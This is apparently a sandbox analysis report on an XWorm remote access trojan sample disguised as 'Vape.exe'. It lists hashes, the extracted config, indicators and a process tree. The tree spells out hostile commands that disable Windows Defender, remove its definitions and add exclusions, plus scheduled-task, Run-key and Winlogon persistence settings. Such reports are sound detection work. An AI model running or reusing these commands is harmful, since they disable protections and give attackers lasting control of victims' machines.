xworm | 9367be61e6f18c4bc17567e4259607293eb60687920b7656728442df79c9fe03

Analysis

max time kernel
1200s
max time network
1204s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
12/02/2024, 13:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Vape.exe
Size

8.4MB
MD5

8afb546a821068f344d5e5481d57fd6a
SHA1

907c78ae51a9bef3612538c1205cb1458b591df6
SHA256

9367be61e6f18c4bc17567e4259607293eb60687920b7656728442df79c9fe03
SHA512

2c4123ada410cfb647f4e32039216e14f06ebdec910471ce9d9ae674191dbc96f915f0c8798672ba640d4a3ce9d176a5139f479c96d4bcde59dea9317a17438e
SSDEEP

196608:8okYHMUWsVqYGAwEFD8bJrxv8pL6x/rFdiX4virXL:KYHRWsVsAwEGbJrxIG1v84vir7

Score

10^/10

xworm evasion persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%Temp%
install_file
USB.exe
pastebin_url
https://pastebin.com/raw/4dSAsSm4

Signatures

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/files/0x000700000002320b-7.dat	family_xworm
behavioral1/memory/4524-25-0x0000000000D70000-0x0000000000D88000-memory.dmp	family_xworm
behavioral1/files/0x0006000000023228-89.dat	family_xworm
behavioral1/memory/1948-90-0x0000000000410000-0x0000000000426000-memory.dmp	family_xworm

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Public\\Documents\\Sub\\Client.exe"	svchost.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	svchosl.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies AppInit DLL entries 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1547.001

Modify Registry
T1112

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	Installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	iyppeb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	Vape.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	sv_host.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	ms_host.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	bsypqh.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	huii.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	huii.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoftsoftware_sv.lnk	ms_host.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoftsoftware_sv.lnk	ms_host.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk	sv_host.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk	sv_host.exe

Executes dropped EXE 64 IoCs

pid	Process
4524	sv_host.exe
2360	svchost.exe
3180	Built.exe
3588	Built.exe
4980	Installer.exe
1948	ms_host.exe
852	svchosl.exe
3692	svchosl.exe
4724	svchosl.exe
2352	microsoftsoftware_sv.exe
792	svhost
4028	svchosl.exe
4928	svchosl.exe
3764	bsypqh.exe
3444	huii.exe
4452	hui.exe
368	svchosl.exe
3076	svchosl.exe
4452	svchosl.exe
2992	iyppeb.exe
3332	huii.exe
4968	hui.exe
3492	svchosl.exe
4356	microsoftsoftware_sv.exe
4552	svhost
3804	svchosl.exe
3524	svchosl.exe
4060	svchosl.exe
5004	svchosl.exe
3536	svchosl.exe
1964	svchosl.exe
4912	microsoftsoftware_sv.exe
2356	svhost
1556	svchosl.exe
4028	svchosl.exe
2848	svchosl.exe
2180	svchosl.exe
2784	svchosl.exe
3624	svchosl.exe
3520	microsoftsoftware_sv.exe
2084	svhost
660	svchosl.exe
1412	svchosl.exe
1380	svchosl.exe
3868	svchosl.exe
1160	svchosl.exe
2204	svchosl.exe
100	microsoftsoftware_sv.exe
2256	svhost
1056	svchosl.exe
1796	svchosl.exe
4364	svchosl.exe
4944	svchosl.exe
2140	svchosl.exe
3884	svchosl.exe
4512	microsoftsoftware_sv.exe
672	svhost
2116	svchosl.exe
3472	svchosl.exe
844	svchosl.exe
3880	svchosl.exe
3628	svchosl.exe
1444	svchosl.exe
3056	microsoftsoftware_sv.exe

Loads dropped DLL 64 IoCs

pid	Process
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
3588	Built.exe
4708	Process not Found
852	svchosl.exe
852	svchosl.exe
4488	Process not Found
792	svhost
1100	powershell.exe
4132	powershell.exe
3096	Process not Found
2144	Process not Found
2860	Process not Found
3136	Process not Found
2352	microsoftsoftware_sv.exe
792	svhost
4632	Process not Found
3980	Process not Found
3764	Process not Found
4356	microsoftsoftware_sv.exe
4552	svhost
4912	microsoftsoftware_sv.exe
2356	svhost
3520	microsoftsoftware_sv.exe
2084	svhost
100	microsoftsoftware_sv.exe
2256	svhost
4512	microsoftsoftware_sv.exe
672	svhost
3056	microsoftsoftware_sv.exe
4368	svhost
5060	Process not Found
3120	Process not Found
1668	Process not Found
2244	Process not Found
4376	microsoftsoftware_sv.exe
2764	svhost
4556	microsoftsoftware_sv.exe
4860	svhost
2076	Process not Found
568	rundll32.exe
1104	svchost.exe
3472	Process not Found
8	Process not Found
1680	timeout.exe
4960	Process not Found
2420	Process not Found
4316	Process not Found
2784	svhost
528	svhost

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000023221-72.dat	upx
behavioral1/files/0x0006000000023221-73.dat	upx
behavioral1/memory/3588-76-0x00007FF913E50000-0x00007FF914439000-memory.dmp	upx
behavioral1/files/0x0006000000023214-96.dat	upx
behavioral1/files/0x000600000002321f-100.dat	upx
behavioral1/memory/3588-117-0x00007FF926FC0000-0x00007FF926FE3000-memory.dmp	upx
behavioral1/memory/3588-119-0x00007FF926FB0000-0x00007FF926FBF000-memory.dmp	upx
behavioral1/files/0x000600000002321b-116.dat	upx
behavioral1/files/0x000600000002321a-115.dat	upx
behavioral1/files/0x0006000000023219-114.dat	upx
behavioral1/files/0x0006000000023218-113.dat	upx
behavioral1/files/0x0006000000023217-112.dat	upx
behavioral1/files/0x0006000000023216-111.dat	upx
behavioral1/files/0x0006000000023215-110.dat	upx
behavioral1/files/0x0006000000023213-109.dat	upx
behavioral1/files/0x0006000000023226-108.dat	upx
behavioral1/files/0x0006000000023225-107.dat	upx
behavioral1/files/0x0006000000023224-106.dat	upx
behavioral1/files/0x0006000000023220-103.dat	upx
behavioral1/files/0x000600000002321e-102.dat	upx
behavioral1/memory/3588-133-0x00007FF91DD00000-0x00007FF91DD2D000-memory.dmp	upx
behavioral1/memory/3588-136-0x00007FF914C10000-0x00007FF914C29000-memory.dmp	upx
behavioral1/memory/3588-137-0x00007FF913E00000-0x00007FF913E23000-memory.dmp	upx
behavioral1/memory/4788-140-0x000001E8C8000000-0x000001E8C8010000-memory.dmp	upx
behavioral1/memory/3588-143-0x00007FF920580000-0x00007FF92058D000-memory.dmp	upx
behavioral1/memory/4788-141-0x000001E8C8000000-0x000001E8C8010000-memory.dmp	upx
behavioral1/memory/3588-146-0x00007FF913C80000-0x00007FF913DF7000-memory.dmp	upx
behavioral1/files/0x000600000002321e-157.dat	upx
behavioral1/memory/3588-160-0x00007FF911B40000-0x00007FF911B59000-memory.dmp	upx
behavioral1/memory/3588-165-0x00007FF911A30000-0x00007FF911AFD000-memory.dmp	upx
behavioral1/memory/3588-181-0x00007FF914C00000-0x00007FF914C0D000-memory.dmp	upx
behavioral1/memory/3588-180-0x0000023F1AD30000-0x0000023F1B250000-memory.dmp	upx
behavioral1/memory/3588-184-0x00007FF90D510000-0x00007FF90DA30000-memory.dmp	upx
behavioral1/memory/3588-163-0x00007FF911B00000-0x00007FF911B33000-memory.dmp	upx
behavioral1/memory/3588-186-0x00007FF913E50000-0x00007FF914439000-memory.dmp	upx
behavioral1/memory/3588-187-0x00007FF911400000-0x00007FF911414000-memory.dmp	upx
behavioral1/memory/3588-196-0x00007FF9112E0000-0x00007FF9113FC000-memory.dmp	upx
behavioral1/memory/3588-217-0x00007FF926FC0000-0x00007FF926FE3000-memory.dmp	upx
behavioral1/memory/3588-213-0x00007FF913E50000-0x00007FF914439000-memory.dmp	upx
behavioral1/memory/3588-222-0x00007FF913E00000-0x00007FF913E23000-memory.dmp	upx
behavioral1/memory/3588-233-0x00007FF911B40000-0x00007FF911B59000-memory.dmp	upx
behavioral1/memory/3588-235-0x00007FF911B00000-0x00007FF911B33000-memory.dmp	upx
behavioral1/memory/3588-236-0x00007FF911A30000-0x00007FF911AFD000-memory.dmp	upx
behavioral1/memory/3588-239-0x00007FF914C00000-0x00007FF914C0D000-memory.dmp	upx
behavioral1/memory/3588-240-0x00007FF913E50000-0x00007FF914439000-memory.dmp	upx
behavioral1/memory/3588-241-0x00007FF9112E0000-0x00007FF9113FC000-memory.dmp	upx
behavioral1/memory/3588-242-0x00007FF926FC0000-0x00007FF926FE3000-memory.dmp	upx
behavioral1/memory/3588-245-0x00007FF926FB0000-0x00007FF926FBF000-memory.dmp	upx
behavioral1/memory/3588-247-0x00007FF91DD00000-0x00007FF91DD2D000-memory.dmp	upx
behavioral1/memory/3588-249-0x00007FF913E00000-0x00007FF913E23000-memory.dmp	upx
behavioral1/memory/3588-248-0x00007FF914C10000-0x00007FF914C29000-memory.dmp	upx
behavioral1/memory/3588-256-0x00007FF911B00000-0x00007FF911B33000-memory.dmp	upx
behavioral1/memory/3588-257-0x00007FF911A30000-0x00007FF911AFD000-memory.dmp	upx
behavioral1/memory/3588-259-0x00007FF90D510000-0x00007FF90DA30000-memory.dmp	upx
behavioral1/memory/3588-254-0x00007FF920580000-0x00007FF92058D000-memory.dmp	upx
behavioral1/memory/3588-252-0x00007FF911B40000-0x00007FF911B59000-memory.dmp	upx
behavioral1/memory/3588-250-0x00007FF913C80000-0x00007FF913DF7000-memory.dmp	upx
behavioral1/memory/3764-243-0x000001D199370000-0x000001D199380000-memory.dmp	upx
behavioral1/memory/3588-238-0x00007FF911400000-0x00007FF911414000-memory.dmp	upx

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\microsoftsoftware_sv = "C:\\Users\\Admin\\AppData\\Local\\Temp\\microsoftsoftware_sv.exe"	ms_host.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svhost"	sv_host.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Sub\\WatchDog.exe"	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
26	raw.githubusercontent.com
35	pastebin.com
36	discord.com
37	pastebin.com
38	pastebin.com
39	discord.com
24	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	icanhazip.com
633	icanhazip.com

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	F:\autorun.inf	svchosl.exe
File created	C:\autorun.inf	svchosl.exe
File opened for modification	C:\autorun.inf	svchosl.exe
File created	D:\autorun.inf	svchosl.exe
File created	F:\autorun.inf	svchosl.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\xdwd.dll	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2688	schtasks.exe
2640	schtasks.exe
224	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
944	timeout.exe
3040	timeout.exe
1680	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
4460	tasklist.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
3592	Vape.exe
4788	powershell.exe
4660	powershell.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4980	Installer.exe
4788	powershell.exe
4788	powershell.exe
4660	powershell.exe
4660	powershell.exe
100	powershell.exe
100	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
100	powershell.exe
4156	powershell.exe
4156	powershell.exe
2996	powershell.exe
2996	powershell.exe
2996	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4524	sv_host.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3592	Vape.exe
Token: SeDebugPrivilege	4524	sv_host.exe
Token: SeDebugPrivilege	2360	svchost.exe
Token: SeDebugPrivilege	1948	ms_host.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeDebugPrivilege	4980	Installer.exe
Token: SeIncreaseQuotaPrivilege	3128	WMIC.exe
Token: SeSecurityPrivilege	3128	WMIC.exe
Token: SeTakeOwnershipPrivilege	3128	WMIC.exe
Token: SeLoadDriverPrivilege	3128	WMIC.exe
Token: SeSystemProfilePrivilege	3128	WMIC.exe
Token: SeSystemtimePrivilege	3128	WMIC.exe
Token: SeProfSingleProcessPrivilege	3128	WMIC.exe
Token: SeIncBasePriorityPrivilege	3128	WMIC.exe
Token: SeCreatePagefilePrivilege	3128	WMIC.exe
Token: SeBackupPrivilege	3128	WMIC.exe
Token: SeRestorePrivilege	3128	WMIC.exe
Token: SeShutdownPrivilege	3128	WMIC.exe
Token: SeDebugPrivilege	3128	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3128	WMIC.exe
Token: SeRemoteShutdownPrivilege	3128	WMIC.exe
Token: SeUndockPrivilege	3128	WMIC.exe
Token: SeManageVolumePrivilege	3128	WMIC.exe
Token: 33	3128	WMIC.exe
Token: 34	3128	WMIC.exe
Token: 35	3128	WMIC.exe
Token: 36	3128	WMIC.exe
Token: SeDebugPrivilege	100	powershell.exe
Token: SeDebugPrivilege	4460	tasklist.exe
Token: SeDebugPrivilege	3764	powershell.exe
Token: SeIncreaseQuotaPrivilege	3128	WMIC.exe
Token: SeSecurityPrivilege	3128	WMIC.exe
Token: SeTakeOwnershipPrivilege	3128	WMIC.exe
Token: SeLoadDriverPrivilege	3128	WMIC.exe
Token: SeSystemProfilePrivilege	3128	WMIC.exe
Token: SeSystemtimePrivilege	3128	WMIC.exe
Token: SeProfSingleProcessPrivilege	3128	WMIC.exe
Token: SeIncBasePriorityPrivilege	3128	WMIC.exe
Token: SeCreatePagefilePrivilege	3128	WMIC.exe
Token: SeBackupPrivilege	3128	WMIC.exe
Token: SeRestorePrivilege	3128	WMIC.exe
Token: SeShutdownPrivilege	3128	WMIC.exe
Token: SeDebugPrivilege	3128	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3128	WMIC.exe
Token: SeRemoteShutdownPrivilege	3128	WMIC.exe
Token: SeUndockPrivilege	3128	WMIC.exe
Token: SeManageVolumePrivilege	3128	WMIC.exe
Token: 33	3128	WMIC.exe
Token: 34	3128	WMIC.exe
Token: 35	3128	WMIC.exe
Token: 36	3128	WMIC.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeDebugPrivilege	852	svchosl.exe
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	4524	sv_host.exe
Token: SeDebugPrivilege	1948	ms_host.exe
Token: SeDebugPrivilege	2352	microsoftsoftware_sv.exe
Token: SeDebugPrivilege	792	svhost
Token: SeDebugPrivilege	4356	microsoftsoftware_sv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3592 wrote to memory of 4524	3592	Vape.exe	83
PID 3592 wrote to memory of 4524	3592	Vape.exe	83
PID 3592 wrote to memory of 2360	3592	Vape.exe	84
PID 3592 wrote to memory of 2360	3592	Vape.exe	84
PID 3592 wrote to memory of 3180	3592	Vape.exe	85
PID 3592 wrote to memory of 3180	3592	Vape.exe	85
PID 3180 wrote to memory of 3588	3180	Built.exe	87
PID 3180 wrote to memory of 3588	3180	Built.exe	87
PID 3592 wrote to memory of 4980	3592	Vape.exe	86
PID 3592 wrote to memory of 4980	3592	Vape.exe	86
PID 3592 wrote to memory of 4980	3592	Vape.exe	86
PID 3592 wrote to memory of 1948	3592	Vape.exe	94
PID 3592 wrote to memory of 1948	3592	Vape.exe	94
PID 3592 wrote to memory of 2076	3592	Vape.exe	91
PID 3592 wrote to memory of 2076	3592	Vape.exe	91
PID 2076 wrote to memory of 944	2076	cmd.exe	90
PID 2076 wrote to memory of 944	2076	cmd.exe	90
PID 4524 wrote to memory of 4788	4524	sv_host.exe	92
PID 4524 wrote to memory of 4788	4524	sv_host.exe	92
PID 1948 wrote to memory of 4660	1948	ms_host.exe	97
PID 1948 wrote to memory of 4660	1948	ms_host.exe	97
PID 4980 wrote to memory of 3440	4980	Installer.exe	111
PID 4980 wrote to memory of 3440	4980	Installer.exe	111
PID 4980 wrote to memory of 3440	4980	Installer.exe	111
PID 3588 wrote to memory of 5052	3588	Built.exe	110
PID 3588 wrote to memory of 5052	3588	Built.exe	110
PID 3588 wrote to memory of 1276	3588	Built.exe	108
PID 3588 wrote to memory of 1276	3588	Built.exe	108
PID 3588 wrote to memory of 2300	3588	Built.exe	100
PID 3588 wrote to memory of 2300	3588	Built.exe	100
PID 3588 wrote to memory of 4692	3588	Built.exe	101
PID 3588 wrote to memory of 4692	3588	Built.exe	101
PID 3588 wrote to memory of 1912	3588	Built.exe	103
PID 3588 wrote to memory of 1912	3588	Built.exe	103
PID 5052 wrote to memory of 100	5052	cmd.exe	109
PID 5052 wrote to memory of 100	5052	cmd.exe	109
PID 1276 wrote to memory of 3764	1276	cmd.exe	112
PID 1276 wrote to memory of 3764	1276	cmd.exe	112
PID 2300 wrote to memory of 4004	2300	cmd.exe	113
PID 2300 wrote to memory of 4004	2300	cmd.exe	113
PID 4692 wrote to memory of 4460	4692	cmd.exe	114
PID 4692 wrote to memory of 4460	4692	cmd.exe	114
PID 1912 wrote to memory of 3128	1912	cmd.exe	115
PID 1912 wrote to memory of 3128	1912	cmd.exe	115
PID 3440 wrote to memory of 2084	3440	cmd.exe	116
PID 3440 wrote to memory of 2084	3440	cmd.exe	116
PID 3440 wrote to memory of 2084	3440	cmd.exe	116
PID 4980 wrote to memory of 852	4980	Installer.exe	117
PID 4980 wrote to memory of 852	4980	Installer.exe	117
PID 4980 wrote to memory of 852	4980	Installer.exe	117
PID 3440 wrote to memory of 3040	3440	cmd.exe	118
PID 3440 wrote to memory of 3040	3440	cmd.exe	118
PID 3440 wrote to memory of 3040	3440	cmd.exe	118
PID 4524 wrote to memory of 2996	4524	sv_host.exe	122
PID 4524 wrote to memory of 2996	4524	sv_host.exe	122
PID 1948 wrote to memory of 4156	1948	ms_host.exe	121
PID 1948 wrote to memory of 4156	1948	ms_host.exe	121
PID 4524 wrote to memory of 3196	4524	sv_host.exe	124
PID 4524 wrote to memory of 3196	4524	sv_host.exe	124
PID 852 wrote to memory of 4744	852	svchosl.exe	126
PID 852 wrote to memory of 4744	852	svchosl.exe	126
PID 852 wrote to memory of 4744	852	svchosl.exe	126
PID 2360 wrote to memory of 656	2360	svchost.exe	129
PID 2360 wrote to memory of 656	2360	svchost.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Vape.exe
"C:\Users\Admin\AppData\Local\Temp\Vape.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3592
- C:\Users\Admin\AppData\Local\Temp\sv_host.exe
  "C:\Users\Admin\AppData\Local\Temp\sv_host.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sv_host.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4788
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sv_host.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svhost'
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost'
    3⤵
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:1100
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Local\Temp\svhost"
    3⤵
    - Creates scheduled task(s)
    PID:2640
- - C:\Users\Admin\AppData\Local\Temp\bsypqh.exe
    "C:\Users\Admin\AppData\Local\Temp\bsypqh.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:3764
  - - C:\Users\Admin\AppData\Local\Temp\huii.exe
      "C:\Users\Admin\AppData\Local\Temp\huii.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:3444
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\hui.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\hui.exe" xui2
        5⤵
        Executes dropped EXE
        
        PID:4452
- - C:\Users\Admin\AppData\Local\Temp\iyppeb.exe
    "C:\Users\Admin\AppData\Local\Temp\iyppeb.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:2992
  - - C:\Users\Admin\AppData\Local\Temp\huii.exe
      "C:\Users\Admin\AppData\Local\Temp\huii.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:3332
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\hui.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\hui.exe" xui2
        5⤵
        Executes dropped EXE
        
        PID:4968
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2360
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Public\Documents\Sub\Client.exe" & exit
    3⤵
    PID:656
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Public\Documents\Sub\Client.exe"
      4⤵
      Creates scheduled task(s)
      PID:224
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3180
- - C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Внимание! Была устранена попытка взлома вашего компьютера! Диспетчер задач временно заблокирован для вашей безопасности!', 0, 'Windows Defender', 32+16);close()""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2300
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Внимание! Была устранена попытка взлома вашего компьютера! Диспетчер задач временно заблокирован для вашей безопасности!', 0, 'Windows Defender', 32+16);close()"
        5⤵
        
        PID:4004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4692
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1912
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1276
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
